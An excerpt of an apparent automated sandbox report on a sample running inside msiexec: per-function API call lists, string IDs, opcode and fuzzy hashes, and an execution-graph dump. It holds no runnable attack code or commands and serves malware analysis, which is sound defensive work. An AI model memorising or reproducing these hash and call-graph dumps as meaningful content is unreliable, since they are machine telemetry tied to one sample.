                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 70dffa2ffc0c2dbe9ce527ef4a24c50dd71cb00b18b77c48bb70d043eb08d3e7
                                                              • Instruction ID: ef550265e79d2b8ce6cbdd0b86a97fedb1318b47d22a931d8fe1fffb18e1ee39
                                                              • Opcode Fuzzy Hash: 70dffa2ffc0c2dbe9ce527ef4a24c50dd71cb00b18b77c48bb70d043eb08d3e7
                                                              • Instruction Fuzzy Hash: FCF0EC715552429B9B18DE58DAC9C177FDEAB317207510A09FA4AE7505CA34F8808A54
                                                              Function 21205351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 2120536F
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 21205381
                                                              • _free.LIBCMT ref: 21205394
                                                              • _free.LIBCMT ref: 212053A5
                                                              • _free.LIBCMT ref: 212053B6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: a2c5ac9e55471e0242e7ef8be9d1ee9b95b94516e5c1b54ea82a45e3c1f68b51
                                                              • Instruction ID: 504e99f2f33d153000bc866b3cc43f202c87f0c7bc5a23c9d23e9baa02d4ec76
                                                              • Opcode Fuzzy Hash: a2c5ac9e55471e0242e7ef8be9d1ee9b95b94516e5c1b54ea82a45e3c1f68b51
                                                              • Instruction Fuzzy Hash: 23F03A74994126EF8F25DF2C9E8851A3BBAB739B30341024AFC149326ADF391402AB84
                                                              Function 21204BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 21204C1D
                                                              • _free.LIBCMT ref: 21204CE8
                                                              • _free.LIBCMT ref: 21204CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Windows\System32\msiexec.exe
                                                              • API String ID: 2506810119-1382325751
                                                              • Opcode ID: 2c8c8c51b1857d9b80582da2e63147e144c7d7f229759ef5ebbee90712977444
                                                              • Instruction ID: 94c918dae7f995a4f3d338641c7e9d993e279dcb5de9e5b520d7d901fad05828
                                                              • Opcode Fuzzy Hash: 2c8c8c51b1857d9b80582da2e63147e144c7d7f229759ef5ebbee90712977444
                                                              • Instruction Fuzzy Hash: BD31B471A40259EFDB11CF99CD84D9EBFFDEBA5310F1082AAF90497201D7719A41CB90
                                                              Function 212086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21206FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 21208731
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 212087BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 212087CC
                                                              • __freea.LIBCMT ref: 212087D5
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: a922298464c71f718152a0f654344c304a1e41c407b7f782f9cda3569304ebed
                                                              • Instruction ID: 9593bfdef004b332c67bb4dff498ab38f91e0dc9cce5dea0d2d42fbf75df19ee
                                                              • Opcode Fuzzy Hash: a922298464c71f718152a0f654344c304a1e41c407b7f782f9cda3569304ebed
                                                              • Instruction Fuzzy Hash: FB318036A0121A9FDF198F64CC84DAF7BB5EB65310F014268FD04D71A4EB35D961CB90
                                                              Function 2120C7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(2120C7DD), ref: 2120C7E6
                                                              • GetModuleHandleA.KERNEL32(?,2120C7DD), ref: 2120C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 2120C860
                                                                • Part of subcall function 2120C803: GetProcAddress.KERNEL32(00000000,2120C7F4), ref: 2120C804
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 7ccb098afeb2f90605823314944e5bd087266447398dea65a51b4b07b2e9d127
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: BB01C4C095524B2DB71356B40C059BA5F989B37670B1437DAF34086193D960873D83AE
                                                              Function 21205CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21201D66,00000000,00000000,?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue), ref: 21205D13
                                                              • GetLastError.KERNEL32(?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue,2120E190,FlsSetValue,00000000,00000364,?,21205BC8), ref: 21205D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21205C88,21201D66,00000000,00000000,00000000,?,21205E85,00000006,FlsSetValue,2120E190,FlsSetValue,00000000), ref: 21205D2D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 3ea69f715468609ae9497b2127c5461a1f6e7622d2f9ffddb165c8ebc6b8852f
                                                              • Instruction ID: 1701a02e9da9ff074f58e2aa1ae00d53d644913ce6ac064a187a3e5ab6088c0d
                                                              • Opcode Fuzzy Hash: 3ea69f715468609ae9497b2127c5461a1f6e7622d2f9ffddb165c8ebc6b8852f
                                                              • Instruction Fuzzy Hash: E901A736652227ABC7118A689C8DE467B5DEF267F17100725FA09D7141D726D902CBE0
                                                              Function 212063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 2120655C
                                                                • Part of subcall function 212062BC: IsProcessorFeaturePresent.KERNEL32(00000017,212062AB,00000000,?,?,?,?,00000016,?,?,212062B8,00000000,00000000,00000000,00000000,00000000), ref: 212062BE
                                                                • Part of subcall function 212062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 212062E0
                                                                • Part of subcall function 212062BC: TerminateProcess.KERNEL32(00000000), ref: 212062E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction ID: 268f3711b83b134a3b69db20c352558f9106978ee257f4b835aae680c7eadf62
                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction Fuzzy Hash: 8451D675E0022ADFDB15CFA8CC80AADBBF5EF69314F158269E514E7304E635AA018B90
                                                              Function 212016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: 29df88d674893e0e63f5c69e744aafd5f9030ad0eeebc622a4f0e94472e9ec29
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 13119475900289AEDB15CFA89C40BEEFBFCAF29314F104056E545E7252E670AA028765
                                                              Function 21201EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 21202903
                                                                • Part of subcall function 212035D2: RaiseException.KERNEL32(?,?,?,21202925,00000000,00000000,00000000,?,?,?,?,?,21202925,?,212121B8), ref: 21203632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 21202920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 74cf8f7f6c9b7c77b7e8181df5a33421bb1d98636cf1b6e20e6792773eb252a8
                                                              • Instruction ID: 9e2276c422484e577b438a482b849e2c124fc6953f7416f23bd90ac5e400ba55
                                                              • Opcode Fuzzy Hash: 74cf8f7f6c9b7c77b7e8181df5a33421bb1d98636cf1b6e20e6792773eb252a8
                                                              • Instruction Fuzzy Hash: BCF0283890420E7F8B04EAE5EC8497D7BAC9F35350B604336FA14924A1EF31FA15C5D0
                                                              Function 212069F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,?,?,21206C7C,?), ref: 21206A1E
                                                              • GetACP.KERNEL32(00000000,?,?,21206C7C,?), ref: 21206A35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: |l !
                                                              • API String ID: 0-2559428224
                                                              • Opcode ID: 1896c7359c9947570b6d4c043961408e200b890966b5ba9f86364d8ace8192b1
                                                              • Instruction ID: 6e93ae40cfb464488592ee47db0fd40d525add98cd26d772d4b328f78737d5d9
                                                              • Opcode Fuzzy Hash: 1896c7359c9947570b6d4c043961408e200b890966b5ba9f86364d8ace8192b1
                                                              • Instruction Fuzzy Hash: 63F0493084011A8FDB00EB69C94CBAD7BB5FB21335F148348F5788A1D2DB765A86CB81

                                                              Execution Graph

                                                              Execution Coverage:5.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:75
                                                              execution_graph 37676 4466f4 37695 446904 37676->37695 37678 446700 GetModuleHandleA 37681 446710 __set_app_type __p__fmode __p__commode 37678->37681 37680 4467a4 37682 4467ac __setusermatherr 37680->37682 37683 4467b8 37680->37683 37681->37680 37682->37683 37696 4468f0 _controlfp 37683->37696 37685 4467bd _initterm __wgetmainargs _initterm 37686 44681e GetStartupInfoW 37685->37686 37687 446810 37685->37687 37689 446866 GetModuleHandleA 37686->37689 37697 41276d 37689->37697 37693 446896 exit 37694 44689d _cexit 37693->37694 37694->37687 37695->37678 37696->37685 37698 41277d 37697->37698 37740 4044a4 LoadLibraryW 37698->37740 37700 412785 37731 412789 37700->37731 37748 414b81 37700->37748 37703 4127c8 37754 412465 memset ??2@YAPAXI 37703->37754 37705 4127ea 37766 40ac21 37705->37766 37710 412813 37784 40dd07 memset 37710->37784 37711 412827 37789 40db69 memset 37711->37789 37715 412822 37811 4125b6 ??3@YAXPAX DeleteObject 37715->37811 37716 40ada2 _wcsicmp 37717 41283d 37716->37717 37717->37715 37720 412863 CoInitialize 37717->37720 37794 41268e 37717->37794 37719 412966 37812 40b1ab free free 37719->37812 37810 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37720->37810 37724 41296f 37813 40b633 37724->37813 37726 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37732 412957 CoUninitialize 37726->37732 37737 4128ca 37726->37737 37731->37693 37731->37694 37732->37715 37733 4128d0 TranslateAcceleratorW 37734 412941 GetMessageW 37733->37734 37733->37737 37734->37732 37734->37733 37735 412909 IsDialogMessageW 37735->37734 37735->37737 37736 4128fd IsDialogMessageW 37736->37734 37736->37735 37737->37733 37737->37735 37737->37736 37738 41292b TranslateMessage DispatchMessageW 37737->37738 37739 41291f IsDialogMessageW 37737->37739 37738->37734 37739->37734 37739->37738 37741 4044cf GetProcAddress 37740->37741 37745 4044f7 37740->37745 37742 4044e8 FreeLibrary 37741->37742 37743 4044df 37741->37743 37744 4044f3 37742->37744 37742->37745 37743->37742 37744->37745 37746 404507 MessageBoxW 37745->37746 37747 40451e 37745->37747 37746->37700 37747->37700 37749 414b8a 37748->37749 37750 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37748->37750 37817 40a804 memset 37749->37817 37750->37703 37753 414b9e GetProcAddress 37753->37750 37756 4124e0 37754->37756 37755 412505 ??2@YAPAXI 37757 41251c 37755->37757 37760 412521 37755->37760 37756->37755 37839 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37757->37839 37828 444722 37760->37828 37765 41259b wcscpy 37765->37705 37844 40b1ab free free 37766->37844 37768 40ad76 37845 40aa04 37768->37845 37771 40ad4b 37771->37768 37857 40a9ce 37771->37857 37772 40a9ce malloc memcpy free free 37778 40ac5c 37772->37778 37774 40ace7 free 37774->37778 37778->37768 37778->37771 37778->37772 37778->37774 37848 40a8d0 7 API calls 37778->37848 37849 4099f4 37778->37849 37780 40ada2 37781 40adaa 37780->37781 37782 40adc9 37780->37782 37781->37782 37783 40adb3 _wcsicmp 37781->37783 37782->37710 37782->37711 37783->37781 37783->37782 37863 40dce0 37784->37863 37786 40dd3a GetModuleHandleW 37868 40dba7 37786->37868 37790 40dce0 3 API calls 37789->37790 37791 40db99 37790->37791 37940 40dae1 37791->37940 37954 402f3a 37794->37954 37796 412766 37796->37715 37796->37720 37797 4126d3 _wcsicmp 37798 4126a8 37797->37798 37798->37796 37798->37797 37800 41270a 37798->37800 37988 4125f8 7 API calls 37798->37988 37800->37796 37957 411ac5 37800->37957 37810->37726 37811->37719 37812->37724 37814 40b640 37813->37814 37815 40b639 free 37813->37815 37816 40b1ab free free 37814->37816 37815->37814 37816->37731 37818 40a83b GetSystemDirectoryW 37817->37818 37819 40a84c wcscpy 37817->37819 37818->37819 37824 409719 wcslen 37819->37824 37822 40a881 LoadLibraryW 37823 40a886 37822->37823 37823->37750 37823->37753 37825 409724 37824->37825 37826 409739 wcscat LoadLibraryW 37824->37826 37825->37826 37827 40972c wcscat 37825->37827 37826->37822 37826->37823 37827->37826 37829 444732 37828->37829 37830 444728 DeleteObject 37828->37830 37840 409cc3 37829->37840 37830->37829 37832 412551 37833 4010f9 37832->37833 37834 401130 37833->37834 37835 401134 GetModuleHandleW LoadIconW 37834->37835 37836 401107 wcsncat 37834->37836 37837 40a7be 37835->37837 37836->37834 37838 40a7d2 37837->37838 37838->37765 37838->37838 37839->37760 37843 409bfd memset wcscpy 37840->37843 37842 409cdb CreateFontIndirectW 37842->37832 37843->37842 37844->37778 37846 40aa14 37845->37846 37847 40aa0a free 37845->37847 37846->37780 37847->37846 37848->37778 37850 409a41 37849->37850 37851 4099fb malloc 37849->37851 37850->37778 37853 409a37 37851->37853 37854 409a1c 37851->37854 37853->37778 37855 409a30 free 37854->37855 37856 409a20 memcpy 37854->37856 37855->37853 37856->37855 37858 40a9e7 37857->37858 37859 40a9dc free 37857->37859 37861 4099f4 3 API calls 37858->37861 37860 40a9f2 37859->37860 37862 40a8d0 7 API calls 37860->37862 37861->37860 37862->37768 37887 409bca GetModuleFileNameW 37863->37887 37865 40dce6 wcsrchr 37866 40dcf5 37865->37866 37867 40dcf9 wcscat 37865->37867 37866->37867 37867->37786 37888 44db70 37868->37888 37872 40dbfd 37891 4447d9 37872->37891 37875 40dc34 wcscpy wcscpy 37917 40d6f5 37875->37917 37876 40dc1f wcscpy 37876->37875 37879 40d6f5 3 API calls 37880 40dc73 37879->37880 37881 40d6f5 3 API calls 37880->37881 37882 40dc89 37881->37882 37883 40d6f5 3 API calls 37882->37883 37884 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37883->37884 37923 40da80 37884->37923 37887->37865 37889 40dbb4 memset memset 37888->37889 37890 409bca GetModuleFileNameW 37889->37890 37890->37872 37893 4447f4 37891->37893 37892 40dc1b 37892->37875 37892->37876 37893->37892 37894 444807 ??2@YAPAXI 37893->37894 37895 44481f 37894->37895 37896 444873 _snwprintf 37895->37896 37897 4448ab wcscpy 37895->37897 37930 44474a 8 API calls 37896->37930 37899 4448bb 37897->37899 37931 44474a 8 API calls 37899->37931 37900 4448a7 37900->37897 37900->37899 37902 4448cd 37932 44474a 8 API calls 37902->37932 37904 4448e2 37933 44474a 8 API calls 37904->37933 37906 4448f7 37934 44474a 8 API calls 37906->37934 37908 44490c 37935 44474a 8 API calls 37908->37935 37910 444921 37936 44474a 8 API calls 37910->37936 37912 444936 37937 44474a 8 API calls 37912->37937 37914 44494b 37938 44474a 8 API calls 37914->37938 37916 444960 ??3@YAXPAX 37916->37892 37918 44db70 37917->37918 37919 40d702 memset GetPrivateProfileStringW 37918->37919 37920 40d752 37919->37920 37921 40d75c WritePrivateProfileStringW 37919->37921 37920->37921 37922 40d758 37920->37922 37921->37922 37922->37879 37924 44db70 37923->37924 37925 40da8d memset 37924->37925 37926 40daac LoadStringW 37925->37926 37927 40dac6 37926->37927 37927->37926 37929 40dade 37927->37929 37939 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37927->37939 37929->37715 37930->37900 37931->37902 37932->37904 37933->37906 37934->37908 37935->37910 37936->37912 37937->37914 37938->37916 37939->37927 37950 409b98 GetFileAttributesW 37940->37950 37942 40daea 37943 40daef wcscpy wcscpy GetPrivateProfileIntW 37942->37943 37949 40db63 37942->37949 37951 40d65d GetPrivateProfileStringW 37943->37951 37945 40db3e 37952 40d65d GetPrivateProfileStringW 37945->37952 37947 40db4f 37953 40d65d GetPrivateProfileStringW 37947->37953 37949->37716 37950->37942 37951->37945 37952->37947 37953->37949 37989 40eaff 37954->37989 37958 411ae2 memset 37957->37958 37959 411b8f 37957->37959 38030 409bca GetModuleFileNameW 37958->38030 37971 411a8b 37959->37971 37961 411b0a wcsrchr 37962 411b22 wcscat 37961->37962 37963 411b1f 37961->37963 38031 414770 wcscpy wcscpy wcscpy CloseHandle 37962->38031 37963->37962 37965 411b67 38032 402afb 37965->38032 37969 411b7f 38088 40ea13 SendMessageW memset SendMessageW 37969->38088 37972 402afb 27 API calls 37971->37972 37973 411ac0 37972->37973 37974 4110dc 37973->37974 37975 41113e 37974->37975 37980 4110f0 37974->37980 38113 40969c LoadCursorW SetCursor 37975->38113 37977 411143 38114 4032b4 37977->38114 38132 444a54 37977->38132 37978 4110f7 _wcsicmp 37978->37980 37979 411157 37981 40ada2 _wcsicmp 37979->37981 37980->37975 37980->37978 38135 410c46 10 API calls 37980->38135 37984 411167 37981->37984 37982 4111af 37984->37982 37985 4111a6 qsort 37984->37985 37985->37982 37988->37798 37990 40eb10 37989->37990 38003 40e8e0 37990->38003 37993 40eb6c memcpy memcpy 37994 40ebe1 37993->37994 37995 40ebb7 37993->37995 37994->37993 37996 40ebf2 ??2@YAPAXI ??2@YAPAXI 37994->37996 37995->37994 37997 40d134 16 API calls 37995->37997 37998 40ec2e ??2@YAPAXI 37996->37998 38001 40ec65 37996->38001 37997->37995 37998->38001 38013 40ea7f 38001->38013 38002 402f49 38002->37798 38004 40e8f2 38003->38004 38005 40e8eb ??3@YAXPAX 38003->38005 38006 40e900 38004->38006 38007 40e8f9 ??3@YAXPAX 38004->38007 38005->38004 38008 40e90a ??3@YAXPAX 38006->38008 38010 40e911 38006->38010 38007->38006 38008->38010 38009 40e931 ??2@YAPAXI ??2@YAPAXI 38009->37993 38010->38009 38011 40e921 ??3@YAXPAX 38010->38011 38012 40e92a ??3@YAXPAX 38010->38012 38011->38012 38012->38009 38014 40aa04 free 38013->38014 38015 40ea88 38014->38015 38016 40aa04 free 38015->38016 38017 40ea90 38016->38017 38018 40aa04 free 38017->38018 38019 40ea98 38018->38019 38020 40aa04 free 38019->38020 38021 40eaa0 38020->38021 38022 40a9ce 4 API calls 38021->38022 38023 40eab3 38022->38023 38024 40a9ce 4 API calls 38023->38024 38025 40eabd 38024->38025 38026 40a9ce 4 API calls 38025->38026 38027 40eac7 38026->38027 38028 40a9ce 4 API calls 38027->38028 38029 40ead1 38028->38029 38029->38002 38030->37961 38031->37965 38089 40b2cc 38032->38089 38034 402b0a 38035 40b2cc 27 API calls 38034->38035 38036 402b23 38035->38036 38037 40b2cc 27 API calls 38036->38037 38038 402b3a 38037->38038 38039 40b2cc 27 API calls 38038->38039 38040 402b54 38039->38040 38041 40b2cc 27 API calls 38040->38041 38042 402b6b 38041->38042 38043 40b2cc 27 API calls 38042->38043 38044 402b82 38043->38044 38045 40b2cc 27 API calls 38044->38045 38046 402b99 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402bb0 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402bc7 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402bde 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402bf5 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402c0c 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402c23 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402c3a 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402c51 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402c68 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c7f 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c99 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402cb3 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402cd5 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402cf0 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402d0b 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402d26 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402d3e 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402d59 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402d78 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d93 38085->38086 38087 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38086->38087 38087->37969 38088->37959 38092 40b58d 38089->38092 38091 40b2d1 38091->38034 38093 40b5a4 GetModuleHandleW FindResourceW 38092->38093 38094 40b62e 38092->38094 38095 40b5c2 LoadResource 38093->38095 38097 40b5e7 38093->38097 38094->38091 38096 40b5d0 SizeofResource LockResource 38095->38096 38095->38097 38096->38097 38097->38094 38105 40afcf 38097->38105 38099 40b608 memcpy 38108 40b4d3 memcpy 38099->38108 38101 40b61e 38109 40b3c1 18 API calls 38101->38109 38103 40b626 38110 40b04b 38103->38110 38106 40b04b ??3@YAXPAX 38105->38106 38107 40afd7 ??2@YAPAXI 38106->38107 38107->38099 38108->38101 38109->38103 38111 40b051 ??3@YAXPAX 38110->38111 38112 40b05f 38110->38112 38111->38112 38112->38094 38113->37977 38115 4032c4 38114->38115 38116 40b633 free 38115->38116 38117 403316 38116->38117 38136 44553b 38117->38136 38121 403480 38334 40368c 15 API calls 38121->38334 38123 403489 38124 40b633 free 38123->38124 38125 403495 38124->38125 38125->37979 38126 4033a9 memset memcpy 38127 4033ec wcscmp 38126->38127 38128 40333c 38126->38128 38127->38128 38128->38121 38128->38126 38128->38127 38332 4028e7 11 API calls 38128->38332 38333 40f508 6 API calls 38128->38333 38131 403421 _wcsicmp 38131->38128 38133 444a64 FreeLibrary 38132->38133 38134 444a83 38132->38134 38133->38134 38134->37979 38135->37980 38137 445548 38136->38137 38138 445599 38137->38138 38335 40c768 38137->38335 38139 4455a8 memset 38138->38139 38147 4457f2 38138->38147 38418 403988 38139->38418 38145 4455e5 38160 445672 38145->38160 38165 44560f 38145->38165 38150 445854 38147->38150 38520 403e2d memset memset memset memset memset 38147->38520 38148 4458bb memset memset 38152 414c2e 14 API calls 38148->38152 38195 4458aa 38150->38195 38543 403c9c memset memset memset memset memset 38150->38543 38151 44595e memset memset 38155 414c2e 14 API calls 38151->38155 38156 4458f9 38152->38156 38154 445a00 memset memset 38566 414c2e 38154->38566 38163 44599c 38155->38163 38164 40b2cc 27 API calls 38156->38164 38157 44558c 38402 444b06 38157->38402 38158 44557a 38158->38157 38613 4136c0 CoTaskMemFree 38158->38613 38429 403fbe memset memset memset memset memset 38160->38429 38173 40b2cc 27 API calls 38163->38173 38174 445909 38164->38174 38176 4087b3 337 API calls 38165->38176 38167 445bca 38175 445c8b memset memset 38167->38175 38231 445cf0 38167->38231 38168 445b38 memset memset memset 38179 445bd4 38168->38179 38180 445b98 38168->38180 38169 445849 38629 40b1ab free free 38169->38629 38189 4459ac 38173->38189 38186 409d1f 6 API calls 38174->38186 38190 414c2e 14 API calls 38175->38190 38187 445621 38176->38187 38177 445585 38614 41366b FreeLibrary 